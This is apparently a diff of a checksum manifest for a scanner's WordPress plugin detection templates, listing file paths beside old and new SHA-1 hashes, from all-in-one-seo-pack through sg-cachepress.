-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:7698cdae22e8514f41dafbcf7f77d0dad6e35da5 -http/technologies/wordpress/plugins/amp.yaml:5d7087de0432335ac402b3498ffe263ba9ea76c5 -http/technologies/wordpress/plugins/antispam-bee.yaml:dbfb0b14e2893f5ab64273c8252a712f96ad03b2 -http/technologies/wordpress/plugins/astra-sites.yaml:50607cb5484ec3e033f6e229b55eaa666fb34225 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:22dff49563180708f7e8b16f9173b7ca4fd0db4f -http/technologies/wordpress/plugins/backwpup.yaml:1d0b3ef6d2d20312a118969c338e0e2ed0a4b616 -http/technologies/wordpress/plugins/better-search-replace.yaml:69907f7e632dc37e23819da2f40c6b1a7ba10214 -http/technologies/wordpress/plugins/better-wp-security.yaml:7c0ee349835e70143f53d910e9e45c7e8f9c92eb -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:6d5b82507be8aaeae251bd091a84702a46151bf3 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:cb6105fa82ac9a765767e0eb88e659fa7d9381ea -http/technologies/wordpress/plugins/breeze.yaml:023ea414e02ba8170a7e3a939444cbd74c750ef0 -http/technologies/wordpress/plugins/broken-link-checker.yaml:9e752d540cf3e4a04d9a144293fc0bf9a38f3b91 -http/technologies/wordpress/plugins/chaty.yaml:94b7c00479b0eac1bc1b06b7376bc58259e83903 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:7a2c91b776638fc49545628cc58c7a8494a2b478 -http/technologies/wordpress/plugins/classic-editor.yaml:6301dda2b99f764c078b71961a81e2c0d283b173 -http/technologies/wordpress/plugins/classic-widgets.yaml:d8e19aa8a0f5e15f12ab876e2b988a803821805b -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e9be5e77dff45b509573005bd2debb4b228be9d5 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:7bf40c52b1760e81a9bd4eeb4dbf3aa718b04892 -http/technologies/wordpress/plugins/coblocks.yaml:4ce773454b48fdbc2e711e778e33c4dd3e67b0c1 -http/technologies/wordpress/plugins/code-snippets.yaml:24f1a6debda3a2d5eb9440915e5c3b6ad144ffe6 -http/technologies/wordpress/plugins/coming-soon.yaml:9f7892e54c72f6fa762e4cee5a9e76575bd4534b -http/technologies/wordpress/plugins/complianz-gdpr.yaml:d582294881c1d0b8c3359c75998165751006a4a5 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7c0b8e90ff696870371f9ff88afb7fc14580f6a9 -http/technologies/wordpress/plugins/contact-form-7.yaml:9a280e3db9ed1d513b79c0aa0cb9f0932edb0196 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:171514cf08af0c9f3ef90eab821df788e459a5dd -http/technologies/wordpress/plugins/cookie-law-info.yaml:062409a7c3583aeebf2306640938cd797cec0815 -http/technologies/wordpress/plugins/cookie-notice.yaml:7ff6a86447f98a7023a6738e4ba3d3bca61ee4fc -http/technologies/wordpress/plugins/copy-delete-posts.yaml:123e8e828368eb51adf35eab0b0ad0d158f81942 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:ac3d6dbc46df91bdb856878f428cce4513bfcb6e -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2990cec997a7de14959d4b945bc621641ebfa883 -http/technologies/wordpress/plugins/custom-css-js.yaml:2ba876aac1937a2e94bfa4ee71a4f91545061f7d -http/technologies/wordpress/plugins/custom-fonts.yaml:d615cfbae95528c774d1bc469de5a490459e71ad -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:74ee7e9132bc7746d42b509f30b016b2327ca689 -http/technologies/wordpress/plugins/disable-comments.yaml:9c41175dc690bfed447b6637deb3a48c026af27c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:fd0075805e4a3143c652c60eee70d15d9c309c06 -http/technologies/wordpress/plugins/duplicate-page.yaml:1199dbaedcea6ac80fbdabe9b9b5114f4066ab78 -http/technologies/wordpress/plugins/duplicate-post.yaml:c996c71485d186f9e8129ab83009314f5741f0b6 -http/technologies/wordpress/plugins/duplicator.yaml:b9106de542bf90afb099711ba5eeecb90a56b657 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:2ef90bf8414dac9b0029d77babe250b5feb0365c +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:645c93a0e661c53cfdade6e8603299fa9df39dec -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7e8f33b53ec52f77b66034718be4b920c2e69f5c -http/technologies/wordpress/plugins/elementor.yaml:6bf9980729df79f5f930b36464d46ac48fae628e -http/technologies/wordpress/plugins/elementskit-lite.yaml:83b08fca676b4b19638b8bd90d3f6b44b06fc836 -http/technologies/wordpress/plugins/enable-media-replace.yaml:25d05b20e5a87f1fdc929395b4039ec28721f6a5 -http/technologies/wordpress/plugins/envato-elements.yaml:2252541af5b3140f045bfad51bf7529f2b64772e -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:d1164dad526b0609096ca3ab93619a44aceb8529 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:fccb5578f88252fe48bffe978ca1518974c3b57d -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:6bd6c1efa6c28cfefe4a385a2d336744dfbd7dc0 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:c7f263697394aa87fde73fa7568f7bd6b0ff80fd -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:8aeca7b774623e1d98422628dc0bdc0b6da51679 -http/technologies/wordpress/plugins/flamingo.yaml:03eac59e4fc0fc9deef1e9a524dcaec645cd7d1c -http/technologies/wordpress/plugins/fluentform.yaml:2945fa306540aa1aad6eaa2dd104d33ab91e774d -http/technologies/wordpress/plugins/font-awesome.yaml:17608dd8e9a586422debfcbfe46c1bce758f8ecc -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:f56d903290e94e23561be77c0fc8ea0203661206 -http/technologies/wordpress/plugins/formidable.yaml:9dff3687fe2f366720163ab94329d8a0fa4ebc14 -http/technologies/wordpress/plugins/forminator.yaml:8054fbda5de22d134700f54d880f320e06b5c1e9 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:14fef159db7e29bf04a0479d2139d3f5ce38bdf3 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:4498ee441960567ed4c667f183e26c5c5f5a483b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:4264f07947153c4adb8cf22dd6f7f1f1806b660b -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:28842b945f8e048c0ed74ecf2620d290515dc1db -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d900c8ef6896587a202699aa0e12368390e28d8f -http/technologies/wordpress/plugins/google-site-kit.yaml:dbcd0ece1d8fad68b5e769e2f1f741cd7d7b2212 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:4ee4cb6d251146c1e138e5c80bdf956ea6e898c7 -http/technologies/wordpress/plugins/gtranslate.yaml:b942a0d6001364fc29ca5d1bdabf75918f29917a -http/technologies/wordpress/plugins/gutenberg.yaml:486526f8c0594abd6c8af2fea208328423178aa7 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:57bdb641220357df4b5e692e20b91a0ecea736d5 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:ab0297b48b038b96d007487449ce480dfd7595b7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:707f069c2b04e20f7634505d1ea3b65923f47aaa -http/technologies/wordpress/plugins/header-footer.yaml:cec0153ee1d5c2f77f4f082ee4d46355d88c69ac -http/technologies/wordpress/plugins/health-check.yaml:be30929389caf4d72b83dea044928ff698dd4d62 -http/technologies/wordpress/plugins/hello-dolly.yaml:55fe8db4b7e4b3f71441c5e67f622cf16b979e13 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:8abf6156b0619a6a5afcf0ac81d21d75c071aaa3 -http/technologies/wordpress/plugins/hostinger.yaml:2f2ea598019213ca03418f7f1c591c86967ca541 -http/technologies/wordpress/plugins/image-optimization.yaml:17deba3e29c9521906cff94d7d4573876ec43bff -http/technologies/wordpress/plugins/imagify.yaml:8ab46a9375529115c77eb9e3f755edd1bbb76c5a -http/technologies/wordpress/plugins/imsanity.yaml:e92ea9ff4e830e1563f8fe4ea2bf9d45e3f0b95e -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:4929e545de0aeb0247fd96aa732599292c213ccd -http/technologies/wordpress/plugins/instagram-feed.yaml:46464ac3d1266511d5b2bc878e13a9b84297a8ec -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:aa04923ab74fa4285945d6e6adde806a019b854f +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:d44cf72e0e6e89409f69a886c9fe2b7369ebe879 -http/technologies/wordpress/plugins/jetpack.yaml:87325eca2f402a828ec4ecd8f4b19b5e0770baf8 -http/technologies/wordpress/plugins/kadence-blocks.yaml:cd642b65c6a1e72ef916bdd972c1196e167e9268 -http/technologies/wordpress/plugins/kirki.yaml:ce7f14157f92af2593e132792e8740bb03c1d937 -http/technologies/wordpress/plugins/leadin.yaml:ea5f40d1e2b0f5d697b0c503c3357a1b42ac6bf8 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:8baad65dbb0d027c0a3c9621577d39230dbb7b6a -http/technologies/wordpress/plugins/limit-login-attempts.yaml:2b14430507446c16aacec19c9c1604df72e21685 -http/technologies/wordpress/plugins/litespeed-cache.yaml:91755ee4041fe0e8c6c6a959646651d963c55c50 -http/technologies/wordpress/plugins/loco-translate.yaml:208875d89562e939146e731af6e3e1dabec13719 -http/technologies/wordpress/plugins/loginizer.yaml:8e789abab5e243d11f19e62e132eaefab330586c +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d4a9e383f2db2b96cba06d83a42225ca889f255b -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:4b0c0af84e07aae7152cd30edc696747ab4d6fce -http/technologies/wordpress/plugins/mailpoet.yaml:28cb98879dfcb6985f2fcd0221f789b0f7c3e795 -http/technologies/wordpress/plugins/maintenance.yaml:e5af9238ee776c4bed87fb2d286d9af4f5c9e627 -http/technologies/wordpress/plugins/mainwp-child.yaml:1ce9dfd0e8c3a4af9ab6f654a4846976322d771a -http/technologies/wordpress/plugins/malcare-security.yaml:cd888494039c7e94f50e4c63bcac4dc92ea81e02 -http/technologies/wordpress/plugins/megamenu.yaml:b2c98f024aff080f29b32fb035d46fd1b506c313 -http/technologies/wordpress/plugins/members.yaml:41e4c77a90f830af200b3a3169cb76093288f5f0 -http/technologies/wordpress/plugins/meta-box.yaml:933bb1c72ce68017ff397f5254c7e1c5c0c5f105 -http/technologies/wordpress/plugins/metform.yaml:6bece36b72418d79b9d538dcadf0ced96ddaa054 -http/technologies/wordpress/plugins/ml-slider.yaml:0ded626270b030ebaff5ef335c7eb5e151b67736 -http/technologies/wordpress/plugins/newsletter.yaml:cf4154eb87da0efc95adfb9b13a6b298a8a80442 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21f65d8ac740455bf41fe8e7dd869f61594912d9 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:514494f8380b9e8403dfc9641e4571bd4290c792 -http/technologies/wordpress/plugins/ninja-forms.yaml:4dd238139ae96bd138ba4e5807822ece15a66ab9 -http/technologies/wordpress/plugins/ocean-extra.yaml:25dd41b8eb2b21c6529e0d3e6c733bf187ab4168 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:e98eefebbaa64dd351f1c43f470c0346f91783d5 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:81186fbcb1976c5e3d92af65168292e303cc1e8d -http/technologies/wordpress/plugins/optinmonster.yaml:8b1204e925aeb39486a7388d74b821781134fe86 -http/technologies/wordpress/plugins/otter-blocks.yaml:efbe78c0e91420789651570f3e959de439e88dd2 -http/technologies/wordpress/plugins/password-protected.yaml:387bc2d9f8b8d8d7053a508becb76a647f442c45 -http/technologies/wordpress/plugins/pdf-embedder.yaml:d1bbf01c076a61b10af28868e8a2e955a9f0b354 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c02c5adab81d81050ce1282a57fa0573a497c356 -http/technologies/wordpress/plugins/pixelyoursite.yaml:9685105dc618f4c032426ef35f6f4bc08d5689ad -http/technologies/wordpress/plugins/polylang.yaml:ae30166d72d45022794cc2e0f8396c74ca192d01 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:75b62ad84680f4fc772c4de57b7fa45c2afc68ad -http/technologies/wordpress/plugins/post-smtp.yaml:59e6b98c1464d44200da97b654e3701bc0f4fa3e -http/technologies/wordpress/plugins/post-types-order.yaml:f865aaa22d7f0ff3a03f8e46ed33c0e510f1e591 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:aebe0dac1f26a231ca75317c3546f49d87e1068c -http/technologies/wordpress/plugins/pretty-link.yaml:20f13e10af569824dbb80f8f2f8c2226a03be2fd -http/technologies/wordpress/plugins/really-simple-captcha.yaml:1691a9379eea745131fdddbdbb19864cd18dbb79 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:f11d4e3e31a4ae76c6cab812ed5fb44ed14c8b8f -http/technologies/wordpress/plugins/redirection.yaml:4ddc667eed98e9ae923da54c11de2bfbaa453233 -http/technologies/wordpress/plugins/redux-framework.yaml:e8c8280bfa21bc2a795fff51c2cc71ec73326f15 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:f7bada3d6d3ff8c51fb4b76f228774248a855025 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:8fdb8501e2614693fbb66a4702b6df6355772d3f -http/technologies/wordpress/plugins/safe-svg.yaml:3496d3a1392ecfc489b0c8018873d8d87a96b096 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:061b6605dfad00fad9c5d47c5949c5c3e0e944ed -http/technologies/wordpress/plugins/sg-cachepress.yaml:13b7f5d3b4ab98e2aacfeddc48fec64d596f03ca -http/technologies/wordpress/plugins/sg-security.yaml:b305c1529c18dc8b395394cc5c5c57bf475fbfcb -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a88289c46b295dd3fe2b27f7b8273c533f42069a -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1f3c33658fae39c741d13970e328b8b4ab4c51d6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:25f21a882f1454093e284b33514d577a413b3312 -http/technologies/wordpress/plugins/simple-history.yaml:a3cff160a8cd3d4a359afd57610947790e3deb61 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 